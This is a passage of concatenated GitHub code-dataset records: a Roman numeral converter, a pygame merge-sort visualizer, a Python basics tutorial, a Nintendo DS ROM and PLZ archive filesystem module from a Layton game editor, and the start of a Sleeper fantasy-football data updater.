[10, 7], 'LXXX': [10, 8], 'XC': [10, 9],\n 'C': [100, 1], 'CC': [100, 2], 'CCC': [100, 3], 'CD': [100, 4], 'D': [100, 5],\n 'DC': [100, 6], 'DCC': [100, 7], 'DCCC': [100, 8], 'CM': [100, 9],\n 'M': [1000, 1], 'MM': [1000, 2], 'MMM': [1000, 3], 'MV^': [1000, 4], 'V^': [1000, 5],\n 'V^M': [1000, 6], 'V^MM': [1000, 7], 'V^MMM': [1000, 8], 'MX^': [1000, 9]}\n _cache_decimal = {}\n _cache_roman = {}\n _CASH_LIMIT = 10000000 # prevent memory overflow\n\n @staticmethod\n def _get_symbol(level: int, digit: int) -> str:\n\n tags = ''\n while level > 1000:\n level //= 1000\n tags += '^'\n symbols = [Roman._symbol[level], Roman._symbol[5 * level], Roman._symbol[10 * level]]\n result = ''\n for idx in Roman._convention[digit]:\n result += symbols[idx] + tags\n return result\n\n @staticmethod\n def _get_digit(roman: str) -> Tuple[int, int, str]:\n\n # collect up to 4 symbols and count carets\n buffer = ''\n car_counters = [0, 0, 0, 0]\n remainders = [0, 0, 0, 0]\n rem = 0\n for character in roman:\n if character == '^':\n car_counters[len(buffer) - 1] += 1\n else:\n if len(buffer) > 0:\n remainders[len(buffer) - 1] = rem\n if len(buffer) >= 4:\n break\n buffer += character\n rem += 1\n remainders[len(buffer) - 1] = rem\n for size in range(len(buffer), 0, -1):\n deduct = min(car_counters[0:size])\n factor = 1\n for times in range(deduct):\n factor *= 1000\n symbol = ''\n for char_index in range(size):\n symbol += buffer[char_index] + (car_counters[char_index] - deduct) * '^'\n\n if symbol in Roman._basic_romans:\n level = Roman._basic_romans[symbol][0] * factor\n digit = Roman._basic_romans[symbol][1]\n reminder = roman[remainders[size - 1]:]\n return level, digit, reminder\n\n raise ValueError('Not found')\n\n @staticmethod\n def convert_to_roman(number: int) -> str:\n \"\"\"\n Convert a decimal integer to a Roman numeral string\n\n :param number: a positive integer\n :return: the Roman numeral\n :raises ValueError: if the number is zero or negative\n \"\"\"\n if number < 1:\n raise ValueError(\n 'The ancient Romans did not recognize 0 as a number neither did they include negative numbers')\n if number in Roman._cache_decimal:\n return Roman._cache_decimal[number]\n else:\n result = ''\n level = 1\n for digit in reversed(str(number)):\n result = Roman._get_symbol(level=level, digit=int(digit)) + result\n 
level *= 10\n\n if len(Roman._cache_decimal) < Roman._CASH_LIMIT:\n Roman._cache_decimal[number] = result\n Roman._cache_roman[result] = number\n\n return result\n\n @staticmethod\n def convert_to_decimal(roman: str) -> int:\n \"\"\"\n Convert a Roman numeral to a decimal\n\n :param roman: a Roman numeral\n :return: the resulting decimal\n :raises ValueError: if the string is not an extended Roman numeral\n \"\"\"\n if not roman:\n return 0\n\n roman = roman.upper()\n if roman in Roman._cache_roman:\n return Roman._cache_roman[roman]\n\n if 'I^' in roman:\n raise ValueError('Not found') # I^ is represented by M\n\n remainder = roman\n number = 0\n prev_level = -1\n while remainder:\n level, digit, remainder = Roman._get_digit(remainder)\n if prev_level < 0:\n prev_level = level\n else:\n if level >= prev_level:\n raise ValueError('Wrong level')\n prev_level = level\n number += digit * level\n\n if len(Roman._cache_decimal) < Roman._CASH_LIMIT:\n Roman._cache_decimal[number] = roman\n Roman._cache_roman[roman] = number\n\n return number\n\n\ndef main() -> int:\n\n do_the_random = False\n if do_the_random:\n for idx in range(1, 1000):\n number = random.randint(1, 9999999)\n print('{} = {}'.format(number, Roman.convert_to_roman(number=number)))\n else:\n test_numbers = [1, 2, 3, 4, 5, 6, 8, 9, 10, 11, 14, 15, 16, 19, 20, 21, 29, 30, 40, 50, 60, 70, 90, 100,\n 110, 111, 119, 120, 140, 149, 150, 199, 200, 300, 400, 500, 600, 700, 900, 999, 1000,\n 1499, 1500, 1501, 1900, 1999, 2222, 2999, 3333, 3999, 4444, 4999, 5555, 5999, 6666,\n 6999, 7777, 7999, 8888, 8999, 9999, 10000, 10001, 10004, 10005, 10006, 10009, 10010,\n 10019, 10022, 10029, 10033, 10039,\n 10044, 10049, 10055, 10059, 10066, 10069, 10077, 10079, 10089, 10099, 10100, 10111, 10199,\n 10222, 10333, 10444, 10555, 10666, 10777, 10888, 10999, 11111, 12222, 13333, 14444, 15555,\n 16666, 17777, 18888, 19999, 20000, 22222, 33333, 44444, 55555, 66666, 77777, 88888, 99999,\n 100000, 111111, 222222, 333333, 444444, 555555, 666666, 777777, 888888, 999999, 1000000,\n 999999999]\n\n test_romans = ['I', 'II', 'III', 'IV', 'V', 'VI', 'VIII', 'IX',\n 'X', 'XI', 'XIV', 'XV', 'XVI', 'XIX',\n 'XX', 'XXI', 'XXIX', 'XXX', 'XL', 'L', 'LX', 'LXX', 'XC',\n 'C', 'CX', 'CXI', 'CXIX', 'CXX', 'CXL', 'CXLIX', 'CL', 'CXCIX', 'CC', 'CCC', 'CD',\n 'D', 'DC', 'DCC', 'CM', 'CMXCIX',\n 'M', 'MCDXCIX', 'MD', 'MDI', 'MCM', 'MCMXCIX', 'MMCCXXII', 'MMCMXCIX', 'MMMCCCXXXIII',\n 'MMMCMXCIX', 'MV^CDXLIV', 'MV^CMXCIX', 'V^DLV', 'V^CMXCIX', 'V^MDCLXVI', 'V^MCMXCIX',\n 'V^MMDCCLXXVII', 'V^MMCMXCIX', 'V^MMMDCCCLXXXVIII', 'V^MMMCMXCIX', 'MX^CMXCIX',\n 'X^', 'X^I', 'X^IV', 'X^V', 'X^VI', 'X^IX', 'X^X', 'X^XIX', 'X^XXII', 'X^XXIX', 'X^XXXIII',\n 'X^XXXIX', 'X^XLIV', 'X^XLIX', 'X^LV', 'X^LIX', 'X^LXVI', 'X^LXIX', 'X^LXXVII', 'X^LXXIX',\n 'X^LXXXIX', 'X^XCIX', 'X^C', 'X^CXI', 'X^CXCIX', 'X^CCXXII', 'X^CCCXXXIII', 'X^CDXLIV',\n 'X^DLV', 'X^DCLXVI', 'X^DCCLXXVII', 'X^DCCCLXXXVIII', 'X^CMXCIX', 'X^MCXI', 'X^MMCCXXII',\n 'X^MMMCCCXXXIII', 'X^MV^CDXLIV', 'X^V^DLV', 'X^V^MDCLXVI', 'X^V^MMDCCLXXVII',\n 'X^V^MMMDCCCLXXXVIII', 'X^MX^CMXCIX',\n 'X^X^', 'X^X^MMCCXXII', 'X^X^X^MMMCCCXXXIII', 'X^L^MV^CDXLIV',\n 'L^V^DLV', 'L^X^V^MDCLXVI', 'L^X^X^V^MMDCCLXXVII', 'L^X^X^X^V^MMMDCCCLXXXVIII',\n 'X^C^MX^CMXCIX',\n 'C^', 'C^X^MCXI', 'C^C^X^X^MMCCXXII', 'C^C^C^X^X^X^MMMCCCXXXIII', 'C^D^X^L^MV^CDXLIV',\n 'D^L^V^DLV', 'D^C^L^X^V^MDCLXVI', 'D^C^C^L^X^X^V^MMDCCLXXVII',\n 'D^C^C^C^L^X^X^X^V^MMMDCCCLXXXVIII', 'C^M^X^C^MX^CMXCIX',\n 'M^', 'C^^M^^X^^C^^M^X^^C^M^X^C^MX^CMXCIX']\n\n for roman_str in 
test_romans:\n print(Roman.convert_to_decimal(roman_str))\n\n print(Roman.convert_to_decimal('V^MMM'))\n print(Roman.convert_to_decimal('V^MMMDCCLXI'))\n try:\n print(Roman.convert_to_decimal('DCCMM'))\n except ValueError as ex:\n print(str(ex))\n try:\n print(Roman.convert_to_decimal('DCCDC'))\n except ValueError as ex:\n print(str(ex))\n try:\n print(Roman.convert_to_decimal('M^'))\n except ValueError as ex:\n print(str(ex))\n\n for idx in test_numbers:\n print('{} = {}'.format(idx, Roman.convert_to_roman(number=idx)))\n\n return 0\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"bendaten/roman","sub_path":"roman.py","file_name":"roman.py","file_ext":"py","file_size_in_byte":8779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72358524412","text":"import random\r\nimport pygame\r\nimport time\r\nimport numpy as np\r\n\r\ndef merge_sort(arr, win, h, w):\r\n blue = (65, 105, 225)\r\n while len(arr) != 1:\r\n win.fill((0,0,0))\r\n l = len(arr)\r\n\r\n counter = 0\r\n for i in range(l): # Draw all the rectangles\r\n for j in range(len(arr[i])):\r\n start_pos = ((counter * 10) + 5, h - arr[i][j])\r\n end_pos = (((counter * 10) + 5), h)\r\n counter += 1\r\n pygame.draw.line(win, blue, start_pos, end_pos, w)\r\n \r\n pygame.display.update()\r\n\r\n\r\n counter = 0\r\n for i in range(l):\r\n if len(arr[i]) == len(arr[i+1]):\r\n tempArr = []\r\n\r\n a = b = 0 \r\n\r\n while a < len(arr[i]) and b < len(arr[i]): \r\n if arr[i][a] < arr[i+1][b]:\r\n tempArr.append(arr[i][a])\r\n a += 1\r\n else:\r\n tempArr.append(arr[i+1][b])\r\n b += 1\r\n \r\n while a < len(arr[i]):\r\n tempArr.append(arr[i][a])\r\n a += 1\r\n \r\n while b < len(arr[i+1]):\r\n tempArr.append(arr[i+1][b])\r\n b += 1\r\n\r\n for j in range(len(arr[i])):\r\n pygame.draw.line(win, (255,0,0), (((counter + j)*10) + 5, h - arr[i][j]), (((counter + j)*10)+5, h), w)\r\n play_sound(arr[i][j])\r\n\r\n pygame.draw.line(win, (75, 255, 100), ((((counter + j + len(arr[i+1])))*10)+5, h-arr[i+1][j]), (((counter + j + len(arr[i+1]))*10)+5, h), w) \r\n play_sound(arr[i+1][j])\r\n time.sleep(0.05) \r\n pygame.display.update()\r\n\r\n arr[i] = tempArr\r\n arr.remove(arr[i+1])\r\n break\r\n \r\n for j in range(len(arr[i])): counter +=1 \r\n return arr\r\n\r\ndef play_sound(f):\r\n sampling_rate = 44100\r\n f = f *5\r\n duration = 0.05\r\n frames = int(duration * sampling_rate)\r\n arr = np.sin(2 * np.pi * f * np.linspace(0, duration, frames))\r\n sound = np.asarray([32767 * arr, 32767 * arr]).T.astype(np.int16)\r\n sound = pygame.sndarray.make_sound(sound.copy())\r\n sound.play()\r\n\r\nif __name__ == \"__main__\":\r\n #Initialising pygame\r\n pygame.init()\r\n pygame.mixer.init()\r\n WIDTH, HEIGHT = 640, 512\r\n win = pygame.display.set_mode((WIDTH, HEIGHT))\r\n pygame.display.set_caption(\"Insertion sort\")\r\n\r\n #Initialising attributes for the rectangles\r\n rect_w = 9\r\n num_rect = int(WIDTH / 10)\r\n\r\n # Set parameters\r\n start_value = 1\r\n end_value = HEIGHT\r\n interval = 8\r\n\r\n # Generate a list of numbers with a constant interval\r\n number_list = list(range(start_value, end_value + 1, interval))\r\n random.shuffle(number_list)\r\n rect_h = [[i] for i in number_list]\r\n\r\n running = True\r\n\r\n while running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n \r\n if event.type == pygame.KEYDOWN:\r\n arr = merge_sort(rect_h, win, HEIGHT, rect_w)\r\n win.fill((0,0,0))\r\n for i in range(len(arr[0])+1):\r\n blue 
= (65, 105, 225)\r\n for j in range(i):\r\n start_pos = ((j * 10) + 5, HEIGHT - arr[0][j])\r\n end_pos = ((j * 10 + 5), HEIGHT)\r\n pygame.draw.line(win, blue, start_pos, end_pos, rect_w)\r\n \r\n pygame.display.update()\r\n \r\n for i in range(len(arr[0])+1):\r\n blue = (65, 105, 225)\r\n for j in range(i):\r\n start_pos = ((j * 10) + 5, HEIGHT - arr[0][j])\r\n end_pos = ((j * 10 + 5), HEIGHT)\r\n pygame.draw.line(win, (75, 255, 100), start_pos, end_pos, rect_w)\r\n play_sound(arr[0][j])\r\n time.sleep(0.05)\r\n pygame.display.update()\r\n \r\n\r\n","repo_name":"shmifful/sorting-algorithms","sub_path":"Merge sort/Merge sort viz.py","file_name":"Merge sort viz.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22987953811","text":"#to use command line arguments\nimport sys\n\nprint (sys.argv)\n\n#to print\nprint(\"This is python basic page\")\n\n#class name starts with an uppercase example Myclass\n#if identifier starts with an underscore it is a private identifier. Example _privateVar\n#if identifier starts with two underscores it is a strong private identifier. Example __strongprivateVar\n#if identifier starts with two underscores and followed by two underscores more, a language-defined special name. Example __privateVar__\n\nif True:\n\tprint(\"Done\")\n\tprint(\"Damage\")\t\nelse:\n\tprint(\"Damage\")\t\n\tprint(\"Undone\")\t\n\nvariable1 = \"This is \"+\\\n\t\"a basic \"+\\\n\t\"Python file.\"\n\nvariable2 = '''This is another statement\nspanning more than two lines\nusing triple quotes'''\n\n# print(variable1)\n\nvariable3 = 5;print(variable3)\n\n#assigning single value to multiple variables\nvar1 = var2 = var3 = 10\n\n# print(var2)\n\n#declaring and assigning multiple variables in the same line\n\nvar4,var5 = 5,6\n\nprint(var5)\n\n#to delete one or more variables\n\n# del var3,var5\n\n# in to check if some value exists in a sequence of characters or a set of numbers, returns true\n\nvar6 = \"This is Chaitanya\"\nvar7 = \"This is chaitanya\"\n\n# if(\"Cha\" in var6):\n# \tprint(var6)\n# else:\n# \tprint(\"Not found\")\t\n\n# if(\"@\" not in var6):\n# \tprint(\"True! Not a mailid\")\n# else:\n# \tprint(\"False! 
No special characters allowed\")\n\n#id(variable) will generate a random number for that instance.\n\n# print(id(var6))\n# print(id(var7))\n\n#is and is not will check if the values of the variables are same to same.\nif(var6 is not var7):\n\tprint(\"Both variables doesn't have same values\")\t\nelse:\n\tprint(\"Both have same values\")\n\t\n\n\n","repo_name":"cbhallamudi/bcvPython","sub_path":"pythonBasicsRevised.py","file_name":"pythonBasicsRevised.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32356220442","text":"import io\nimport os\nimport re\n\nimport ndspy.rom\nfrom ndspy.fnt import *\n\nfrom formats.binary import *\nfrom .compression import *\n\n\nclass Archive:\n \"\"\"\n Abstract interface representing a file archive.\n \"\"\"\n files: List[bytes] = []\n \"\"\"List of the data contained in the files.\"\"\"\n opened_files: list = []\n \"\"\"List of the currently opened files.\"\"\"\n\n def open(self, file: Union[AnyStr, int], mode: str = \"rb\") -> Union[io.BytesIO, io.TextIOWrapper]:\n pass\n\n def add_file(self, file: str) -> Optional[int]:\n \"\"\"\n Adds a file at the specified path.\n\n Parameters\n ----------\n file : str\n The path where the file should be created.\n\n Returns\n -------\n int\n The id of the created file.\n \"\"\"\n pass\n\n def remove_file(self, file: str):\n \"\"\"\n Removes the file at the specified path.\n\n Parameters\n ----------\n file : str\n Path of the file which should be removed.\n \"\"\"\n pass\n\n def rename_file(self, path: str, new_filename: str):\n \"\"\"\n Renames the file at the specified path to the specified file name.\n\n Parameters\n ----------\n path : str\n Path of the file which should be renamed.\n new_filename : str\n New filename for the file.\n \"\"\"\n pass\n\n\nclass RomFile(io.BytesIO):\n \"\"\"\n Wrapper as io.BytesIO for a file in a ROM.\n \"\"\"\n def __init__(self, archive, index: int, operation: str = \"w\"):\n if operation not in [\"r\", \"w\", \"a\"]:\n raise NotImplementedError(f\"operation: {operation}\")\n self.archive = archive\n self.id = index\n self.opp = operation\n if self not in self.archive.opened_files:\n self.archive.opened_files.append(self)\n super().__init__(self.archive.files[index] if operation in [\"r\", \"a\"] else b\"\")\n if operation == \"a\":\n self.read()\n\n def writable(self) -> bool:\n return self.opp in [\"w\", \"a\"]\n\n def close(self):\n self.flush()\n super().close()\n if self in self.archive.opened_files:\n self.archive.opened_files.remove(self)\n\n def fileno(self) -> int:\n return self.id\n\n def flush(self):\n if not self.closed:\n if self.opp != \"r\":\n self.archive.files[self.id] = self.getvalue()\n super().flush()\n\n def __enter__(self):\n super().__enter__()\n return self\n\n def __exit__(self, *args):\n self.close()\n super().__exit__(*args)\n\n def __del__(self):\n self.close()\n\n\nclass CompressedIOWrapper(io.BytesIO):\n \"\"\"\n Wrapper for a compressed file.\n \"\"\"\n def __init__(self, stream, double_typed: Optional[bool] = None):\n \"\"\"\n Parameters\n ----------\n stream : io.BytesIO\n Stream to use for internal data.\n double_typed : bool\n Whether the file has its compression type specified twice.\n \"\"\"\n self._stream = stream\n\n current, self.double_typed = decompress(stream.read(), double_typed)\n\n super().__init__(current)\n\n def close(self):\n self.flush()\n super().close()\n self._stream.close()\n\n def flush(self):\n if 
self._stream.writable():\n self._stream.truncate(0)\n self._stream.seek(0)\n self._stream.write(compress(self.getvalue(), double_typed=self.double_typed))\n super().flush()\n self._stream.flush()\n\n def __enter__(self):\n super().__enter__()\n return self\n\n\nclass NintendoDSRom(ndspy.rom.NintendoDSRom, Archive):\n \"\"\"\n Archive wrapping around ndspy.rom.NintendoDSRom\n \"\"\"\n opened_files: List[RomFile]\n _loaded_archives: dict\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.lang = \"en\"\n self.is_eu = False\n if self.name == b\"LAYTON2\":\n if self.idCode == b\"YLTE\":\n self.lang = \"en\"\n elif self.idCode == b\"YLTJ\":\n self.lang = \"jp\"\n elif self.idCode.startswith(b\"YLT\"):\n self.is_eu = True\n arm9 = self.loadArm9()\n lang_address = 0x02000d3c - arm9.ramAddress\n lang_id = self.arm9[lang_address]\n lang_table = [\"jp\", \"en\", \"sp\", \"fr\", \"it\", \"ge\", \"du\", \"ko\", \"ch\"]\n try:\n self.lang = lang_table[lang_id]\n except IndexError:\n self.is_eu = False\n self.lang = \"en\"\n\n self._opened_files = []\n \"\"\"List of currently opened files.\"\"\"\n self._loaded_archives: Dict[str, PlzArchive] = {}\n \"\"\"List of currently loaded archives.\"\"\"\n\n self._get_archive_call = False\n\n def get_archive(self, path):\n \"\"\"\n Gets the plz archive from the specified path. An archive should not be opened in any other way.\n\n Parameters\n ----------\n path : str\n Path of the plz archive.\n\n Returns\n -------\n PlzArchive\n The PLZ archive as a PlzArchive object.\n \"\"\"\n if not path[0] == \"/\":\n raise ValueError(\"Path should start with slash.\")\n if path not in self._loaded_archives:\n self._get_archive_call = True\n self._loaded_archives[path] = PlzArchive(path, rom=self)\n self._get_archive_call = False\n return self._loaded_archives[path]\n\n def save(self, *args, **kwargs):\n # Save all archives before saving the ROM.\n self._get_archive_call = True\n for arch in self._loaded_archives:\n self._loaded_archives[arch].save()\n self._get_archive_call = False\n return super(NintendoDSRom, self).save(*args, **kwargs)\n\n # TODO: Unify archive opening and make sure archive are opened only once\n def open(self, file: Union[AnyStr, int], mode: str = \"rb\") -> Union[io.BytesIO, io.TextIOWrapper]:\n \"\"\"\n Open the corresponding file in the ROM.\n\n Parameters\n ----------\n file : str | int\n The path or the id of the file.\n mode : str\n The mode for opening the file ('r', 'w', 'a' and the options 'b', '+')\n\n Returns\n -------\n RomFile | io.TextIOWrapper\n The opened rom file.\n \"\"\"\n\n match = re.findall(r\"^([rwa])(b?)(\\+?)$\", mode)\n if not match:\n raise ValueError(f\"invalid mode: '{mode}'\")\n create = False\n text = True\n if match:\n if match[0][1] == \"b\":\n text = False\n if match[0][2] == \"+\":\n create = True\n\n if isinstance(file, int):\n fileid = file\n file = self.filenames.filenameOf(file)\n else:\n fileid = self.filenames.idOf(file)\n if not fileid and create:\n fileid = self.add_file(file)\n if not fileid:\n raise FileNotFoundError(f\"file '{file}' could not be opened nor created\")\n if not fileid:\n raise FileNotFoundError(f\"file '{file}' could not be opened\")\n\n if file.lower().endswith(\".plz\") and not self._get_archive_call:\n # Alert on the log of this action.\n logging.warning(\"PLZ archive not opened from get_archive!\", stack_info=True)\n\n rom_file = RomFile(self, fileid, match[0][0])\n if text:\n return io.TextIOWrapper(rom_file, encoding=\"cp1252\")\n return rom_file\n\n def 
add_file(self, file: str) -> Optional[int]:\n folder_name, filename = os.path.split(file)\n folder_add = self.filenames[folder_name]\n new_file_id = folder_add.firstID + len(folder_add.files)\n\n # Insert our new file into this ID\n self.files.insert(new_file_id, b\"\")\n\n # Add our file to the folder\n folder_add.files.append(filename)\n\n # Change the firstID of all the folders after our base folder.\n def increment_first_index_if_needed(new_id, root: Folder):\n if root.firstID >= new_id and root != folder_add:\n root.firstID += 1\n\n for fd in root.folders:\n increment_first_index_if_needed(new_id, fd[1])\n\n increment_first_index_if_needed(new_file_id, self.filenames)\n\n # increment the id of loaded files after our base id\n for fp in self._opened_files:\n if fp.id > new_file_id:\n fp.id += 1\n\n if fp.id == new_file_id:\n fp.close()\n\n return new_file_id\n\n def remove_file(self, file: str):\n folder_name, filename = os.path.split(file)\n folder: Folder = self.filenames[folder_name]\n fileid = self.filenames.idOf(file)\n folder.files.remove(filename)\n del self.files[fileid]\n\n def decrement_first_index_if_needed(removed_id, root: Folder):\n if root.firstID > removed_id:\n root.firstID -= 1\n\n for fd in root.folders:\n decrement_first_index_if_needed(removed_id, fd[1])\n\n decrement_first_index_if_needed(fileid, self.filenames)\n for fp in self._opened_files:\n if fp.id > fileid:\n fp.id -= 1\n\n if fp.id == fileid:\n fp.close()\n\n def rename_file(self, path: str, new_filename: str):\n folder_name, filename = os.path.split(path)\n folder: Folder = self.filenames[folder_name]\n index = folder.files.index(filename)\n folder.files[index] = new_filename\n\n def move_file(self, old_path, new_path):\n \"\"\"\n Moves the specified file from old_path to new_path.\n\n Parameters\n ----------\n old_path : str\n The old path of the file.\n new_path : str\n The new path of the file.\n \"\"\"\n\n # TODO: What happens with archives?\n\n with self.open(old_path, \"rb\") as f:\n data = f.read()\n self.remove_file(old_path)\n with self.open(new_path, \"wb+\") as f:\n f.write(data)\n\n # TODO: Docstrings for folder methods.\n\n @staticmethod\n def folder_split(path) -> List[str]:\n return [x for x in path.split(\"/\") if x]\n\n def folder_get_parent(self, path) -> Folder:\n *basedirs, subdir = self.folder_split(path)\n if basedirs:\n base_path = \"/\".join(basedirs) + \"/\"\n return self.filenames[base_path]\n else: # The folder is located at the root.\n return self.filenames\n\n def add_folder(self, path):\n parent = self.folder_get_parent(path)\n new_folder = Folder(firstID=len(self.files))\n parent.folders.append((self.folder_split(path)[-1], new_folder))\n\n def remove_folder(self, path):\n folder = self.filenames[path]\n if not folder:\n raise Exception(f\"Directory {path} does not exist.\")\n if folder.files or folder.folders:\n raise Exception(f\"Directory {path} not empty.\")\n\n parent = self.folder_get_parent(path)\n\n parent.folders.remove((self.folder_split(path)[-1], folder))\n\n def rename_folder(self, old_path, new_path):\n folder = self.filenames[old_path]\n\n # get parents\n old_parent = self.folder_get_parent(old_path)\n new_parent = self.folder_get_parent(new_path)\n\n # generate folder items.\n old_folder_item = (self.folder_split(old_path)[-1], folder)\n new_folder_item = (self.folder_split(new_path)[-1], folder)\n\n if old_parent != new_parent:\n old_parent.folders.remove(old_folder_item)\n new_parent.folders.append(new_folder_item)\n else: # same parent, keep the folder 
index\n index = old_parent.folders.index(old_folder_item)\n new_parent.folders[index] = new_folder_item\n\n\nclass FileFormat:\n \"\"\"\n An abstract class representing a file format on a Nintendo DS rom.\n\n Derived classes implement reading and saving methods for their specific file format.\n \"\"\"\n\n _compressed_default = 0\n \"\"\"\n The compression on this file format.\n \n - 0 - No compression\n - 1 - Compressed file\n - 2 - Double typed compressed file\n \"\"\"\n\n _last_compressed = _compressed_default\n \"\"\"The compression last used when opening the file.\"\"\"\n _last_filename: Optional[str] = None\n \"\"\"The last filename used when opening the file.\"\"\"\n _last_rom: Archive = None\n \"\"\"The last rom used when opening the file.\"\"\"\n\n def __init__(self, filename: str = None, file=None, compressed=None, rom: Archive = None, **kwargs):\n if filename is not None:\n self._last_filename = filename\n self._last_rom = rom\n file = rom.open(filename, \"rb\") if rom else open(filename, \"rb\")\n\n if compressed is None:\n compressed = self._compressed_default\n if compressed:\n file = CompressedIOWrapper(file, double_typed=(compressed == 2))\n self._last_compressed = compressed\n\n if file is not None:\n self.read_stream(file)\n\n for kwarg in kwargs:\n self.__dict__[kwarg] = kwargs[kwarg]\n\n if filename is not None:\n file.close() # we opened the file here, we close the file here\n\n def save(self, filename=None, file=None, compressed=None, rom: Archive = None):\n should_close = False\n if not file:\n should_close = True\n if filename:\n file = rom.open(filename, \"wb+\") if rom else open(filename, \"wb+\")\n self._last_filename = filename\n self._last_rom = rom\n elif self._last_filename:\n if self._last_rom:\n file = self._last_rom.open(self._last_filename, \"wb+\")\n else:\n file = open(self._last_filename, \"wb+\")\n\n if compressed is None:\n compressed = self._last_compressed\n if compressed:\n file = CompressedIOWrapper(file, double_typed=(compressed == 2))\n\n self.write_stream(file)\n\n # Close file if we opened it here\n if should_close:\n file.close()\n\n def read_stream(self, stream):\n \"\"\"Abstract function used for reading the file data.\"\"\"\n pass\n\n def write_stream(self, stream):\n \"\"\"Abstract function used for writing the file data.\"\"\"\n pass\n\n\nclass PlzArchive(Archive, FileFormat):\n \"\"\"\n A Plz Archive, a file containing other files within, so that they are compressed.\n \"\"\"\n _compressed_default = 1\n\n filenames: List[str] = []\n \"\"\"List of the names of the files present in the plz archive.\"\"\"\n files: List[bytes] = []\n \"\"\"List of the data of the files present in the plz archive.\"\"\"\n\n def read_stream(self, stream):\n if isinstance(stream, BinaryReader):\n rdr = stream\n else:\n rdr = BinaryReader(stream)\n\n self.filenames = []\n self.files = []\n\n header_size = rdr.read_uint32()\n archive_file_size = rdr.read_uint32()\n assert rdr.read(4) == b\"PCK2\"\n rdr.seek(header_size)\n\n while rdr.c < archive_file_size:\n start_pos = rdr.c\n\n file_header_size = rdr.read_uint32()\n file_total_size = rdr.read_uint32()\n rdr.seek(4, io.SEEK_CUR)\n file_size = rdr.read_uint32()\n\n filename = rdr.read_string(encoding=\"shift-jis\")\n\n rdr.seek(start_pos + file_header_size)\n file = rdr.read(file_size)\n rdr.seek(start_pos + file_total_size)\n\n self.filenames.append(filename)\n self.files.append(file)\n\n def write_stream(self, stream):\n if isinstance(stream, BinaryWriter):\n wtr = stream\n else:\n wtr = 
BinaryWriter(stream)\n\n wtr.write_uint32(16)\n wtr.write_uint32(0) # placeholder file_size\n wtr.write(b\"PCK2\")\n wtr.write_uint32(0)\n\n for i in range(len(self.files)):\n header_size = 16 + len(self.filenames[i]) + 1\n header_size += 4 - header_size % 4\n\n total_size = header_size + len(self.files[i])\n total_size += 4 - total_size % 4\n c = wtr.c\n wtr.write_uint32(header_size)\n wtr.write_uint32(total_size)\n wtr.write_uint32(0)\n wtr.write_uint32(len(self.files[i]))\n\n wtr.write_string(self.filenames[i])\n wtr.seek(c + header_size)\n wtr.write(self.files[i])\n # Seek while adding bytes\n while wtr.c != c + total_size:\n wtr.write_uint8(0)\n\n file_size = len(wtr)\n wtr.seek(4)\n wtr.write_uint32(file_size)\n\n def open(self, file: Union[AnyStr, int], mode: str = \"rb\") -> Union[io.BytesIO, io.TextIOWrapper]:\n match = re.findall(r\"^([rwa])(b?)(\\+?)$\", mode)\n if not match:\n raise ValueError(f\"invalid mode: '{mode}'\")\n create = False\n text = True\n if match:\n if match[0][1] == \"b\":\n text = False\n if match[0][2] == \"+\":\n create = True\n\n if isinstance(file, int):\n fileid = file\n else:\n try:\n fileid = self.filenames.index(file)\n except ValueError:\n fileid = None\n if fileid is None and create:\n fileid = self.add_file(file)\n if not fileid:\n raise FileNotFoundError(f\"file '{file}' could not be opened nor created\")\n if fileid is None:\n raise FileNotFoundError(f\"file '{file}' could not be opened\")\n\n rom_file = RomFile(self, fileid, match[0][0])\n if text:\n return io.TextIOWrapper(rom_file)\n return rom_file\n\n def add_file(self, filename: str):\n new_file_id = len(self.files)\n self.files.append(b\"\")\n self.filenames.append(filename)\n\n return new_file_id\n\n def remove_file(self, filename: str):\n if filename not in self.filenames:\n return\n index = self.filenames.index(filename)\n self.files.pop(index)\n self.filenames.pop(index)\n\n def rename_file(self, old_filename, new_filename):\n if old_filename not in self.filenames:\n return\n index = self.filenames.index(old_filename)\n self.filenames[index] = new_filename\n","repo_name":"C3RV1/LaytonEditor","sub_path":"formats/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":18514,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"3354015029","text":"import json\nimport utils\nimport os\nimport os.path\nfrom datetime import timedelta, datetime\nfrom sleeper_wrapper import League, User, Players, Stats\n\n\ndef resource_needs_update(path):\n five_days_ago = datetime.timestamp(datetime.now() - timedelta(days=5))\n ctime = os.path.getctime(path)\n if ctime < five_days_ago:\n return True\n else:\n return False\n\n\ndef update_players(path):\n print(\"Updating players.\")\n p = Players()\n players = p.get_all_players()\n # resp_data = json.loads(resp.json())\n with open(path, 'w') as outfile:\n json.dump(players, outfile, indent=2)\n return players\n\n\ndef update_stats(path, week):\n print(\"Updating stats.\")\n s = Stats()\n curr_stats = s.get_week_stats('regular', config['seasonYear'], week)\n with open(path, 'w') as outfile:\n json.dump(curr_stats, outfile, indent=2)\n outfile.close()\n return curr_stats\n\n\ndef update_projections(path, week):\n print(\"Updating Projections.\")\n s = Stats()\n curr_projections = s.get_week_projections('regular', config['seasonYear'], week)\n with open(path, 'w') as outfile:\n json.dump(curr_projections, outfile, indent=2)\n outfile.close()\n return curr_projections\n\n\ndef 
